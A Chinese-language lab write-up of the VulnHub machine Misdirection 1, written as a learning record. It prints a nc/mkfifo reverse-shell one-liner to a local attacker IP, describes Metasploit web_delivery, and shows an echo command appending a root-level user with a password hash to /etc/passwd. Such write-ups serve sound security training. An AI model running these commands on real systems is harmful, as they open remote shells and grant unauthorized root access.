Misdirection 1--VulnHub系列学习记录

纪要：了解openssl工具 通过 /etc/passwd 提权 了解Metasploit的 Web Delivery Scrip 反弹shell 了解收集非常见反弹shell命令方式

1.正常思路先主机发现，端口扫描

端口扫描 

登录80/8080端口首页没什么发现，先用nikto简单看下8080端口发现debug目录

看了眼开始考虑反弹shell,这儿演示两种方式，第一种是利用非常规nc反弹，第二种考虑到常规命令方式无法反弹shell想到利用msf的exploit/multi/script/web_delivery模块

首先利用NC命令反弹，本地先开启监听，debug页面输入反弹命令，即可得到shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.31.40 444 >/tmp/f

第二种方法利用msf反弹shell如下，

 payload我就用了默认的python,当然你也可以改其他的，可以show targets 显示支持的类型，然后set target id ，设置好其他载荷run就行了

 

可以看到生成了一段python反弹shell代码，把这段代码复制到debug页面回车后可以看到msf已经反弹得到了一shell

接下来两种方法的操作一样，利用命令: python -c "import pty;pty.spawn('/bin/bash')"得到一交互式tty,发现用户brexit可以以root身份免密码执行bash命令

切换到用户brexit，发现brexit用户组可以向/etc/passwd 写入文件权限，那我们可以给brexit或新增一用户写入文件获取/bin/bash

利用openssl工具生成秘钥，新增一用户ce把秘钥信息，加到/etc/passwd文件中

echo 'ce:$1$mf6MaYyb$vAVg/tWjikIc6MwQpfnYl1:0:0:ce:/root:/bin/bash' >> /etc/passwd

 切换到ce, 直接到root用户了，拿到root.txt文件，over

 

这里提一下，echo命令这里后面只能用单引号把新用户信息追加到/etc/passwd中，双引号就是不行，不明白为什么，如果有清楚的同学麻烦指导下

 虽然已经有这个文件但切换用户验证就是失败，不明白，回头想想。